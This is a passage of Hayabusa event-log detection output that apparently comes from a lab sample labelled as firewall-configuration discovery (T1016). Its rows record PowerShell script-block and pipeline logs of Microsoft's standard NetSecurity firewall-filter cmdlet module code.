[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings 
= 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name 
= 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 
($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() 
} } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 
NetFirewallServiceFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
